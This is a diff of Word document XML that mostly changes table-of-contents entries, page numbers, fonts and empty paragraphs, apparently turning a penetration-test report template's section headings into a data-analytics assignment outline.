-        <w:rPr>
+        </w:rPr>
+        <w:t xml:space="preserve">2.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>– High-Level Summary</w:t>
+        <w:t>PFM and CDF</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1849,7 +1842,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc59959350 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc59959351 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1866,7 +1859,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>9</w:t>
+        <w:t>11</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1877,7 +1870,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="TOC2"/>
+        <w:pStyle w:val="TOC1"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -1888,14 +1881,27 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
-        </w:rPr>
-        <w:t>2.1 Sample Report - Recommendations</w:t>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3.0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>Programming for Data Analytics</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
         </w:rPr>
         <w:tab/>
       </w:r>
@@ -1909,7 +1915,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc59959351 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc59959352 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1937,7 +1943,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="TOC1"/>
+        <w:pStyle w:val="TOC2"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -1948,16 +1954,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">3.0 Sample Report </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t xml:space="preserve">3.1 Sample Report </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>– Methodologies</w:t>
+        <w:t>– Information Gathering</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1975,7 +1983,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc59959352 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc59959353 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2016,51 +2024,43 @@
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.1 Sample Report </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+        </w:rPr>
+        <w:t>3.2 Sample Report – Service Enumeration</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>– Information Gathering</w:t>
+        <w:tab/>
       </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:tab/>
+        <w:fldChar w:fldCharType="begin"/>
       </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc59959354 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc59959353 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
       </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>11</w:t>
+        <w:t>12</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2085,7 +2085,7 @@
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>3.2 Sample Report – Service Enumeration</w:t>
+        <w:t>3.3 Sample Report – Penetration</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2103,7 +2103,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc59959354 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc59959355 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2120,7 +2120,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>12</w:t>
+        <w:t>13</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2145,7 +2145,7 @@
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>3.3 Sample Report – Penetration</w:t>
+        <w:t>3.4 Sample Report – Maintaining Access</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2163,7 +2163,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc59959355 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc59959356 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2180,7 +2180,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>13</w:t>
+        <w:t>17</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2204,13 +2204,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
-        </w:rPr>
-        <w:t>3.4 Sample Report – Maintaining Access</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3.5 Sample Report </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
         </w:rPr>
+        <w:t>– House Cleaning</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:tab/>
       </w:r>
       <w:r>
@@ -2223,7 +2231,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc59959356 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc59959357 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2240,7 +2248,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>17</w:t>
+        <w:t>18</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2251,7 +2259,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="TOC2"/>
+        <w:pStyle w:val="TOC1"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -2262,77 +2270,21 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.5 Sample Report </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+        </w:rPr>
+        <w:t xml:space="preserve">4.0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>Machine Learning for Data Analysis</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>– House Cleaning</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc59959357 \h </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>18</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TOC1"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:noProof/>
-          <w:color w:val="auto"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-ZA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>4.0 Additional Items Not Mentioned in the Report</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2411,35 +2363,24 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:u w:color="000000"/>
-          <w:lang w:eastAsia="en-ZA"/>
-          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:miter w14:lim="400000"/>
-          </w14:textOutline>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:u w:color="000000"/>
-          <w:lang w:eastAsia="en-ZA"/>
-          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:miter w14:lim="400000"/>
-          </w14:textOutline>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t>Introduction</w:t>
@@ -4803,7 +4744,9 @@
           </w14:textOutline>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
           <w:color w:val="000000"/>
@@ -4816,19 +4759,15 @@
             <w14:miter w14:lim="400000"/>
           </w14:textOutline>
         </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
           <w:color w:val="000000"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="14"/>
-          <w:u w:color="000000"/>
           <w:lang w:eastAsia="en-ZA"/>
           <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
@@ -4843,9 +4782,8 @@
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:u w:color="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
           <w:lang w:eastAsia="en-ZA"/>
           <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
@@ -4854,13 +4792,14 @@
           </w14:textOutline>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:u w:color="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
           <w:lang w:eastAsia="en-ZA"/>
           <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
@@ -4868,19 +4807,15 @@
             <w14:miter w14:lim="400000"/>
           </w14:textOutline>
         </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:u w:color="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
           <w:lang w:eastAsia="en-ZA"/>
           <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
@@ -4892,77 +4827,11 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:u w:color="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
           <w:lang w:eastAsia="en-ZA"/>
           <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
@@ -4970,15 +4839,15 @@
             <w14:miter w14:lim="400000"/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve">1.0 </w:t>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:u w:color="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
           <w:lang w:eastAsia="en-ZA"/>
           <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
@@ -4986,15 +4855,15 @@
             <w14:miter w14:lim="400000"/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve">Data </w:t>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:u w:color="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
           <w:lang w:eastAsia="en-ZA"/>
           <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
@@ -5002,15 +4871,15 @@
             <w14:miter w14:lim="400000"/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>Preparation and Visualization</w:t>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:u w:color="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
           <w:lang w:eastAsia="en-ZA"/>
           <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
             <w14:noFill/>
@@ -5018,51 +4887,320 @@
             <w14:miter w14:lim="400000"/>
           </w14:textOutline>
         </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="14"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
